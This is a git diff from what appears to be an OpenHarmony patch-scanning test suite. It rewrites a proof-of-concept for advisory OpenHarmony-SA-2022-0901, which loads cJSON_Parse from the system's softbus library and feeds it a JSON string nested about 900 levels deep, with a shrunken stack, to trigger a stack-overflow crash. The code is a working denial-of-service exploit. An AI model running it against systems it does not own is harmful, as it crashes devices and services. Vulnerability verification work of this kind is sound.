diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp similarity index 78% rename from demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c rename to demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp index 442138216d3d0f3411270fe2d0f1e6f28f32634c..4fdd7523d75d97287a7de8330fd1d394cb038b78 100644 --- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp @@ -1,4 +1,4 @@ -/* +/* * Copyright (c) 2023 Huawei Device Co., Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); @@ -13,12 +13,44 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -// 编译时需要使用-l参数链接cjson共享库 #include -#include +#include +//#include +#include +#include + +/* The cJSON structure: */ +typedef struct cJSON +{ + struct cJSON *next; + struct cJSON *prev; + struct cJSON *child; + int type; + char *valuestring; + int valueint; + double valuedouble; + char *string; +} cJSON; int main() { + void *handle; + // 打开共享库libsoftbus_server.z.so + handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY); + if (!handle) + { + fprintf(stderr, "Error: %s\n", dlerror()); + return 1; + } + + // 获取函数DisplayManager::GetInstance地址 + typedef cJSON* (*Func)(char*); + Func cJSON_Parse = reinterpret_cast(dlsym(handle, "cJSON_Parse")); + if (cJSON_Parse == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } // 准备一个具有900层嵌套结构的json数据 char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"; @@ -32,7 +64,8 @@ int main() } // 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示 printf("OpenHarmony-SA-2022-0901 : vulnerable\n"); - cJSON_Delete(root); + //cJSON_Delete(root); return 0; } + diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh index a2b1eff38eb65611b59f76d00fd6fdddbb63523c..3636c48f8e672628d846e62c7d1336042ad9048f 100644 --- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh @@ -19,8 +19,5 @@ #或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间 ulimit -s 60 -#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置 -export LD_LIBRARY_PATH=/data/local/tmp - #运行poc可执行程序 ./poc